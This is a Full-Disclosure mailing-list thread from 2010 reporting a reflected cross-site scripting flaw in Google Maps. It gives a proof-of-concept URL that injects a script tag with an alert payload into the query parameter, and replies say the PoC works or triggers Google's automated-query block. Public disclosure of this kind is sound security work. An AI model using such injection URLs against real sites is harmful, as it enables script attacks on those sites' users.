I tried the PoC and it works as advertised, however due to the amount of requests to the same url, I suppose Google noticed something fishy...
Regards, Chris. On Tue, Jan 12, 2010 at 1:58 PM, Michael Lenz <shadow.stal...@gmx.de> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Your PoC generates: > > " > *Google* > Sorry... > > > We're sorry... > > ... but your computer or network may be sending automated queries. To > protect our users, we can't process your request right now. > > See Google Help > <http://www.google.com/support/bin/answer.py?answer=86640> for more > information. > > © 2009 Google - Google Home <http://www.google.com>" > > > So..? > > gaurav baruah schrieb: >> Google Maps XSS (currently unpatched) >> >> Discovered By - >> Pratul Agrawal (pratu...@gmail.com) >> Gaurav Baruah (baruah.gau...@gmail.com) >> >> >> PoC - > http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8 >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > gaurav baruah schrieb: >> Google Maps XSS (currently unpatched) >> >> Discovered By - >> Pratul Agrawal (pratu...@gmail.com) >> Gaurav Baruah (baruah.gau...@gmail.com) >> >> >> PoC - > http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8 >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAktMcfAACgkQ12k6J+72BxijGwCgvA7qEWtv8D9ImB9vGc8FBkZf > xOUAnjUQ3dhG6bGwg690pqDXLyzeDQYC > =GYKt > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
